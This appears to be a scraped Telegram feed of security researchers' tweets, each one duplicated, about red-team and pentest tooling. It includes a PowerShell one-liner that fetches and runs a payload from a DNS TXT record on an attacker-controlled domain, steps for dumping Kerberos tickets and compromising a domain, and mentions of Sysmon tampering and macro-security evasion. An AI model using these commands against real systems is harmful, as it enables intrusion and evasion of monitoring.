This media is not supported in your browser
VIEW IN TELEGRAM
π [ FuzzySec, b33f ]
I'm releasing a NuGet package I wrote for @xforcered AdvSim.Cryptography. This NuGet is a simple wrapper which implements sane defaults for a number of Symmetric and Asymmetric cryptographic functions π«π₯
GitHub -> https://t.co/wmHKxryWqF
NuGet -> https://t.co/dECi5kB8aE
π https://github.com/xforcered/AdvSim.Cryptography
π https://www.nuget.org/packages/AdvSim.Cryptography/1.0.0
π₯ [ tweet ]
I'm releasing a NuGet package I wrote for @xforcered AdvSim.Cryptography. This NuGet is a simple wrapper which implements sane defaults for a number of Symmetric and Asymmetric cryptographic functions π«π₯
GitHub -> https://t.co/wmHKxryWqF
NuGet -> https://t.co/dECi5kB8aE
π https://github.com/xforcered/AdvSim.Cryptography
π https://www.nuget.org/packages/AdvSim.Cryptography/1.0.0
π₯ [ tweet ]
π [ mpgn_x64, mpgn ]
"All our admin are in the Protected Users group, we must be secure !"
The actual security π½
1β£ Dump kerberos tickets with lsassy (thanks to @remiescourrou)
2β£ Convert & Import π
3β£ CrackMapExec <fqdn> -u user -p '' -k
4β£ You have 4-hour to compromise the domain π₯π
πͺ
π₯ [ tweet ]
"All our admin are in the Protected Users group, we must be secure !"
The actual security π½
1β£ Dump kerberos tickets with lsassy (thanks to @remiescourrou)
2β£ Convert & Import π
3β£ CrackMapExec <fqdn> -u user -p '' -k
4β£ You have 4-hour to compromise the domain π₯π
πͺ
π₯ [ tweet ]
π [ Alh4zr3d, Alh4zr3d ]
Sexy tip for your red team ops: avoid IEX and Invoke-WebRequest in your PowerShell commands. Instead, host a text record with your payload at one of your (unburned) domains and do this: "powershell . (nslookup -q=txt some.owned.domain.com)[-1]"
π₯ [ tweet ]
Sexy tip for your red team ops: avoid IEX and Invoke-WebRequest in your PowerShell commands. Instead, host a text record with your payload at one of your (unburned) domains and do this: "powershell . (nslookup -q=txt some.owned.domain.com)[-1]"
π₯ [ tweet ]
π [ 0xdea, raptor ]
Simple AS/400 Hacking (via @buherator)
https://t.co/JEcySWimNJ
π https://blog.silentsignal.eu/2022/09/05/simple-ibm-i-as-400-hacking/
π₯ [ tweet ]
Simple AS/400 Hacking (via @buherator)
https://t.co/JEcySWimNJ
π https://blog.silentsignal.eu/2022/09/05/simple-ibm-i-as-400-hacking/
π₯ [ tweet ]
π [ daem0nc0re, daem0nc0re ]
Added my CSharp PoC for transacted hollowing.
Interesting technique :)
https://t.co/5Tt4F2mf1g
π https://github.com/daem0nc0re/TangledWinExec/commit/f898bf157ad993f900985d78b8d8fdc22df0163c
π₯ [ tweet ]
Added my CSharp PoC for transacted hollowing.
Interesting technique :)
https://t.co/5Tt4F2mf1g
π https://github.com/daem0nc0re/TangledWinExec/commit/f898bf157ad993f900985d78b8d8fdc22df0163c
π₯ [ tweet ]
π [ hackthebox_eu, Hack The Box ]
hey, @TikTokSupport let us introduce you to pentesting real quick
π₯ [ tweet ]
hey, @TikTokSupport let us introduce you to pentesting real quick
π₯ [ tweet ]
Ρ
Π΅Ρ
Π΅Ρ
Π΅π2
π [ mariuszbit, mgeeky | Mariusz Banach ]
β’οΈ Can confirm: Macros killed in Office 365, 2207 (Build 15427.20210)
1. if doc has MOTW, macros are disabled.
2. if doc is opened from MOTW flagged ISO/IMG, macros are disabled
ISOs are no longer effective containers for MOTW evasion.
However, bundling payloads into LNK is π₯
π₯ [ tweet ]
β’οΈ Can confirm: Macros killed in Office 365, 2207 (Build 15427.20210)
1. if doc has MOTW, macros are disabled.
2. if doc is opened from MOTW flagged ISO/IMG, macros are disabled
ISOs are no longer effective containers for MOTW evasion.
However, bundling payloads into LNK is π₯
π₯ [ tweet ]
π [ thefLinkk, thefLink ]
Today we published a new tool to tamper with Sysmon.
Uses handle elevation and a SACL bypass to remain difficult to observe using Sysmon itself or Windows Event logs.
https://t.co/OZ4tkgNOAD
π https://github.com/codewhitesec/SysmonEnte
π₯ [ tweet ][ quote ]
Today we published a new tool to tamper with Sysmon.
Uses handle elevation and a SACL bypass to remain difficult to observe using Sysmon itself or Windows Event logs.
https://t.co/OZ4tkgNOAD
π https://github.com/codewhitesec/SysmonEnte
π₯ [ tweet ][ quote ]
π [ Six2dez1, Six2dez ]
I've packed in GitHub an @obsdmd's Vault for web pentesting assessments, it's still pretty simple but I included my Web Pentest Checklist updated, so feel free to contribute!
Here it is:
https://t.co/jx4a9UB2wT
#Pentesting #Web #Obsidian #Markdown #Hacking
π https://github.com/six2dez/obsidian-pentesting-vault
π₯ [ tweet ]
I've packed in GitHub an @obsdmd's Vault for web pentesting assessments, it's still pretty simple but I included my Web Pentest Checklist updated, so feel free to contribute!
Here it is:
https://t.co/jx4a9UB2wT
#Pentesting #Web #Obsidian #Markdown #Hacking
π https://github.com/six2dez/obsidian-pentesting-vault
π₯ [ tweet ]
π [ M4yFly, Mayfly ]
Let's continue to pwn GOAD for fun and no profit :)
We will have fun with ADCS this time, thanks a lot to @ly4k_ for the certify tool π
https://t.co/QwIsA0ipM2
π https://mayfly277.github.io/posts/GOADv2-pwning-part6/
π₯ [ tweet ]
Let's continue to pwn GOAD for fun and no profit :)
We will have fun with ADCS this time, thanks a lot to @ly4k_ for the certify tool π
https://t.co/QwIsA0ipM2
π https://mayfly277.github.io/posts/GOADv2-pwning-part6/
π₯ [ tweet ]
π [ mpgn_x64, mpgn ]
A much needed module during internal pentest will be added to CrackMapExec tonight π
Why scan a /16 when you can get all ip/dns records of the domain using get-network module ? π₯
Thanks to @_dirkjan (this module is adidnsdump as module) and @snovvcrash for the cidr trick !
π₯ [ tweet ]
A much needed module during internal pentest will be added to CrackMapExec tonight π
Why scan a /16 when you can get all ip/dns records of the domain using get-network module ? π₯
Thanks to @_dirkjan (this module is adidnsdump as module) and @snovvcrash for the cidr trick !
π₯ [ tweet ]
π [ subtee, Casey Smith ]
Quick/easy alert if someone runs..
adfind.exe
qwinsta.exe
nltest.exe
tasklist.exe
seatbelt.exe
procdump64.exe
or _other_ odd, rare commands?
Give this a try?
β€οΈfeedback, ways to improve.
It's not perfect, we know.
Help us improve/refine it.
https://t.co/tJ3buUL49E
π https://github.com/thinkst/canarytokens
π₯ [ tweet ]
Quick/easy alert if someone runs..
adfind.exe
qwinsta.exe
nltest.exe
tasklist.exe
seatbelt.exe
procdump64.exe
or _other_ odd, rare commands?
Give this a try?
β€οΈfeedback, ways to improve.
It's not perfect, we know.
Help us improve/refine it.
https://t.co/tJ3buUL49E
π https://github.com/thinkst/canarytokens
π₯ [ tweet ]
π [ awakecoding, Marc-AndrΓ© Moreau ]
Get-RdpLogonEvent: extract the list of recent RDP logons from the event viewer and become a magician π§ββοΈ that can answer impossible questions like "is it really using Kerberos (nope), or did it downgrade to NTLM (again)"? π https://t.co/1TKpLfZB5w
π https://gist.github.com/awakecoding/5fda938a5fd2d29ebffb31eb023fe51c
π₯ [ tweet ]
Get-RdpLogonEvent: extract the list of recent RDP logons from the event viewer and become a magician π§ββοΈ that can answer impossible questions like "is it really using Kerberos (nope), or did it downgrade to NTLM (again)"? π https://t.co/1TKpLfZB5w
π https://gist.github.com/awakecoding/5fda938a5fd2d29ebffb31eb023fe51c
π₯ [ tweet ]
π [ ShitSecure, S3cur3Th1sSh1t ]
Still so much stuff to learn. Can really recommend going through the posts of @EmericNasi when some free timeslot is available π₯
https://t.co/XeJ7MoxxPj
π https://blog.sevagas.com/
π₯ [ tweet ]
Still so much stuff to learn. Can really recommend going through the posts of @EmericNasi when some free timeslot is available π₯
https://t.co/XeJ7MoxxPj
π https://blog.sevagas.com/
π₯ [ tweet ]
π [ HuskyHacksMK, Matt | HuskyHacks ]
ππ Landed!
Happy to announce my PR for Nim shellcode generation support has been merged into the Metasploit Framework/MSFVenom!
huge thank you to @gray_sec whose PR for Go shellcode support lit the path. and thank you to the @rapid7 team for their help with the process!
πβ
π₯ [ tweet ]
ππ Landed!
Happy to announce my PR for Nim shellcode generation support has been merged into the Metasploit Framework/MSFVenom!
huge thank you to @gray_sec whose PR for Go shellcode support lit the path. and thank you to the @rapid7 team for their help with the process!
πβ
π₯ [ tweet ]